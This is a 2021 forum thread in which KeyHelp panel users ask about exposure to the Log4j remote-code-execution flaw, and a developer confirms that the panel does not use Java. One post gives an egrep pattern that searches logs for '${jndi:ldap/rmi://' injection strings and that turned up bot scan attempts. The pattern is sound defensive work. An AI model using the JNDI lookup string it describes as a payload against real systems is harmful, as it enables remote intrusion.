Page 1 of 1
Log4j RCE 0-day mitigation - should keyhelp users be worried?
Posted: Sat 11. Dec 2021, 05:34
by majorboobage
I just got an emai from cloudflare, but unfortunately I couldn't find any information whether the panel uses log4j or not. Сan someone from the developers clarify?
https://blog.cloudflare.com/cve-2021-44 ... itigation/
thanks!
Re: Log4j RCE 0-day mitigation - should keyhelp users be worried?
Posted: Sat 11. Dec 2021, 17:13
by nikko
I have checked on a clean system, I think, its not installed or enabled by default (liblog4j2-java).
More from the devs of KH.
Re: Log4j RCE 0-day mitigation - should keyhelp users be worried?
Posted: Sat 11. Dec 2021, 21:55
by Tobi_BB21
When I do
Code: Select all
egrep -i -r '\$\{jndi:(ldap[s]?|rmi)://' /var/log
I am getting as a result the keys of /var/log/apache2/keyhelp/other_vhosts_access.log. Is that something to be worried about or what can be done?
Re: Log4j RCE 0-day mitigation - should keyhelp users be worried? [SOLVED]
Posted: Mon 13. Dec 2021, 09:01
by Alexander
KeyHelp itself does not use Java and therefore does not use this lib.
There may be additional software running on your server using Java, depending on the applications you are running, but they are not related to KeyHelp.
---
Tobi_BB21 wrote: ↑Sat 11. Dec 2021, 21:55
Code: Select all
egrep -i -r '\$\{jndi:(ldap[s]?|rmi)://' /var/log
I am getting as a result the keys of /var/log/apache2/keyhelp/other_vhosts_access.log. Is that something to be worried about or what can be done?
These are just bots trying to see if your server is vulnerable to an attack on this library.
You should ask yourself, do you use Java on your system? - Than it can either be ignored or you have to take necessary steps.
---
KeyHelp is running apt-get update && apt-get upgrade on a regular basis (see maintenance intervals in KeyHelp). Even if you have some Java applications on your server the issue should be fixed automatically soon.